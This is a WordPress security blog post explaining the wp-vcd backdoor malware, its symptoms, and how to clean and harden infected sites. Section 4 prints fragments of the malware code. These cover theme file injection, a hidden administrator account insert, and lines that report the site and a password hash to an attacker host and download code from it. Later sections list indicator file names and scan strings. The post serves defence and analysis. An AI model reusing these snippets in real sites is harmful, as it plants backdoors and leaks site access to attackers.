Last Updated: 24th July, 2022

A few days back our own website experienced this wp-vcd.php Malware Attack, all of a sudden. We instantly took steps to resolve the issue with appropriate actions. We consulted with our hosting provider and later we secured our website from the wp-vcd.php Malware Attack with the help of free versions of Wordfence Security – Firewall & Malware Scan Plugin and Anti-Malware Security and Brute-Force Firewall Plugin and imposed some more security strategies.

Therefore, please don’t implement, change or delete any files without reading the full article. As we request you SHOULD NOT use each and every Security Plugins unless you know what you are doing. Finally, remember to always take a backup before whatever you do. Let’s now concentrate on our “How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected” Guide.

Table of Contents:-

• 1: What Is WordPress wp-vcd Malware and wp-vcd Malware Hack?
• 2: The top reasons that are responsible for the wp-vcd Malware Hack.
• 3: What are the Signs and Symptoms of wp-vcd Malware?
• 4: Scrutinizing of what the wp-vcd Malware does?
• 5: How to clean up the wp-vcd Malware Infection?
  • 5.1: Strategy: 1 – Scan for files on the server that are typically vulnerable to get infected with the wp-vcd hack:
  • 5.2: Strategy: 2 – Scan for string design patterns those are found in infected malware files:
• 6: How to secure WordPress and stay protected from the Backdoor Hack?
• 7: Conclusion and VILab India Ultimate WordPress Security Guide

1: What Is WordPress wp-vcd Malware and wp-vcd Malware Hack?

As of late, we observed another new sort of malware infecting the WordPress websites by utilizing flaws in obsolete themes and plugins. The wp-vcd malware makes a backdoor access to your website by including hidden WordPress administrator users. Further, a few variations of the malicious codes have been believed to alter the core WordPress files and furthermore include new files in the installations /wp-includes directory.

• The wp-vcd malware makes Spam URLs on the website (additionally alluded to as URL Injection).
• The malware makes a backdoor passageway which enables hackers to access your website for longer periods.
• Hackers can misuse the vulnerabilities in WordPress themes and plugins by uploading or transferring the wp-vcd malware on exposed websites.

Such a hack can be easily avoided by maintaining a strategic monitoring with a Web Application Firewall (WAF), such as Sucuri SiteCheck and customary malware scanning. It is additionally fundamental to check any modification of WordPress core files, themes and plugins.

2: The top reasons that are responsible for the wp-vcd Malware Hack.

• The most wide recognized reason of the hack was the utilization of a nulled theme in which the wp-vcd malware as a rule comes pre-hooked with each downloaded theme from any nulled theme websites.
• If you are still utilizing obsolete WordPress themes and plugins on your website.
• If NO Web Application Firewall (WAF) introduced to shield hacking efforts made by hackers.

3: What are the Signs and Symptoms of wp-vcd Malware?

• • A completely New WordPress Admin user has been included out of the blue.
  • Your hosting provider might have suspended your WordPress hosting account on account of wp-vcd malware attack to secure the other different websites on the same server.
  • SEO spam, for example, Japanese search results or Pharma Hack attack in Google Search Results is another very common sign and symptom of the game. Become familiar with WordPress spam in search results and how to secure them. The following is the screen capture of Google spam indexed results:

• Unknown JavaScript codes in the source of your website.
• Pages of your website are being diverted to obscure and shady websites.
• Unknown PHP files in your installations wp-includes folder which is not found in the WordPress GitHub repository.
• There are PHP files in your installations wp-content/uploads directory and its sub-directory folders.

4: Scrutinizing of what the wp-vcd Malware does?

Within your theme (whatever theme you are using), in the functions.php file, you might observe some codes like this:

<!--?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?-->

This code incorporates the class.theme-modules.php file which as it happens installs the wp-vcd malware into different themes already installed (regardless of enabled/disabled mode) and makes the various vindictive malicious files.

Below mentioned are the different patterns for code snippets of the malware suspicious code:

Pattern 1

<!--?php //install_code1 error_reporting(0); ini_set('display_errors', 0); DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 50); DEFINE('P', $_SERVER['DOCUMENT_ROOT']); $GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...(base64-encoded string of PHP code) ...; ?-->

Pattern 2

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
 @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
 if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
 @file_put_contents('wp-tmp.php', $tmpcontent);
 }
 } ; ?>

Pattern 3

$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[...Blah blah blah..]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
   $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

Pattern 4

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){
    if (strpos($content, 'WP_V_CD') === false){
        $content = $install_code . $content ;
        @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
        touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
    }
    else { $ping = false; }
}

Pattern 5

if ($ping) { $content = @file_get_contents(‘http://www.spekt[dot]cc/test[dot]php?host=' . $_SERVER[“HTTP_HOST”] . ‘&password=’ . $install_hash); @file_put_contents(ABSPATH . ‘/wp-includes/class.wp.php’, file_get_contents(‘http://www.spekt[dot]cc/admin[dot]txt')); }
if ($ping2) { $content = @file_get_contents(‘http://www.spekt[dot]cc/test[dot]php?host=' . $_SERVER[“HTTP_HOST”] . ‘&password=’ . $install_hash); @file_put_contents(ABSPATH . ‘wp-includes/class.wp.php’, file_get_contents(‘http://www.spekt[dot]cc/admin[dot]txt'));//echo ABSPATH . ‘wp-includes/class.wp.php’; }

Pattern 6

$wpdb->query(“INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (‘100011111’, ‘100011111’, ‘\$P\$c18615a1ef0e1cd813b388b4B6e29bcd.’, ‘100011111’, ‘[email protected]’, ‘’, ‘2010–06–07 00:00:00’, ‘’, ‘0’, ‘100010010’)”);

Pattern 7

if( isset($_GET[‘key’]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo ‘

’; } }

Pattern 8

function wp_temp_setupx($phpCode) 
{
 $tmpfname = tempnam(sys_get_temp_dir(), “wp_temp_setupx”);
 $handle = fopen($tmpfname, “w+”); 
 fwrite($handle, “<!--?php\n” . $phpCode); 
 fclose($handle);
 include $tmpfname; unlink($tmpfname);
 return get_defined_vars();
}
</code>
</pre>
<p><strong>Pattern 9</strong></p>
<pre><code class="language-php">
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
[...]
$post_content = preg_replace('!</p>
<div id="'.$div_code_name.'">(.*?)</div>
<p>!s', '', $data -> post_content);
[...]
$file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);
[...]
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
</code>
</pre>
<p>
new_releases
Artificial Intelligence (AI) Voice Impersonation Threat
Read More!open_in_new
</p>
<p><strong>Pattern 10</strong></p>
<pre><code class="language-php">
if ( ! function_exists( 'wp_temp_setup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if($tmpcontent = @file_get_contents("http://www.spekt[dot]cc/codeX[dot]php?i=".$path))
</code>
</pre>
<p>There may be more patterns, but we need to understand <strong>minutely </strong>and <strong>perfectly </strong>before we act on these patterns.</p>
<p>As we had analyzed in the before segment, this code would make another new administrator user with a name something like <strong>100010010</strong>. The goal of this backdoor access administrator account is to ensure that the hacker can get to the website, regardless of whether you erase the malicious code – essentially, so the attackers could attack your website at a later purpose of time.</p>
<p>
new_releases
Managed Service Providers (MSPs) And Managed Security Service Providers (MSSPs) Can Thrive In “Interesting Times”
Read More!open_in_new
</p>
<h2><span id="How-to-clean-up-the-wp-vcd-Malware-Infection"></span>5: How to clean up the wp-vcd Malware Infection?</h2>
<p>Scan for the events of the underneath files/strings on your server and inspect their matters. Make sure to run a <strong>diff check</strong> of the file contents with relating files in the <a href="https://github.com/WordPress/WordPress" rel="noopener" target="_blank">WordPress core GitHub repository</a> or a plugin / theme directory. You can utilize both of the methodologies (or both) utilizing <strong>SSH </strong>(Secure Shell) or utilizing your <strong>IDE </strong>(Integrated Development Environment).</p>
<h3><span id="Strategy-1-Scan-for-files-on-the-server-that-are-typically-vulnerable-to-get-infected-with-the-wp-vcd-hack"></span>5.1: <strong>Strategy: 1</strong> – Scan for files on the server that are typically vulnerable to get infected with the wp-vcd hack:</h3>
<ol>
<li><strong>wp-includes/wp-vcd.php</strong></li>
<li>wp-includes/wp-tmp.php</li>
<li>wp-content/themes/*/functions.php (each and every theme installed on the server regardless of being dynamic or not)</li>
<li>class.theme-modules.php</li>
<li>class.wp.php</li>
<li>admin.txt</li>
<li>codexc.txt</li>
<li>code1.php</li>
<li>cookie.txt</li>
<li><strong>class.theme-modules.php</strong> (inside of your theme folder)</li>
<li>codeX.php</li>
<li>test.php</li>
</ol>
<p>
new_releases
Content Services Platforms (CSPs) Must Be ‘Need-To-Know’ (NTK) Security Ready
Read More!open_in_new
</p>
<h3><span id="Strategy-2-Scan-for-string-design-patterns-those-are-found-in-infected-malware-files"></span>5.2: <strong>Strategy: 2</strong> – Scan for string design patterns those are found in infected malware files:</h3>
<ol>
<li>$install_code</li>
<li>tmpcontentx</li>
<li>function wp_temp_setupx</li>
<li>wp-tmp.php</li>
<li>derna.top/code.php</li>
<li>stripos($tmpcontent, $wp_auth_key)</li>
</ol>
<p><img src="https://res.cloudinary.com/https-vilabin-com/image/upload/q_auto/v1555669750/Secure%20wp-vcd.php%20Malware%20Attack%20In%20WordPress/How_to_secure_WordPress_and_stay_protected_from_the_Backdoor_Hack.jpg" width="755" height="378" alt="How to secure WordPress and stay protected from the Backdoor Hack" class="aligncenter size-full chobi" ?-->

6: How to secure WordPress and stay protected from the Backdoor Hack?

1. Create a simple yet bold security strategy for your WordPress website:
   1. Clean – Diligently make sure that your website files and the database is 100% clean and malware free.
   2. Secure – Install a good Web Application Firewall (WAF) like Wordfence Security – Firewall & Malware Scan Plugin to block any-kind of re-infection attempts.
   3. Monitor –Run regular malware scans to check if any of the files/database have been altered or not.
2. Delete any-kind of unused WordPress themes (even if those are disabled).
3. Totally avoid Nulled themes and plugins on your website.
4. Regularly and religiously update the WordPress core files, Plugins and themes.

7: Conclusion and VILab India Ultimate WordPress Security Guide

Disinfecting any kind of infected websites with such malware isn’t in every case simple. Since, when they are actuated on a website, they will in general infect different sections of the website also by implanting the diverse kind of malicious codes.

Moreover, this specific malware likewise makes a backdoor access which permits the trouble makers to control with your website. Consequently, it is vital to make a viable security strategy which completes an exhaustive analysis of your website. Also, a while later totally expels the hack from your website. We strongly recommend that you must follow our Ultimate WordPress Security Guide, where you can find 25+ tricks and resolutions to stay secure online.

Try hard not to be selfish. Must share with all of yours WordPress users and friends.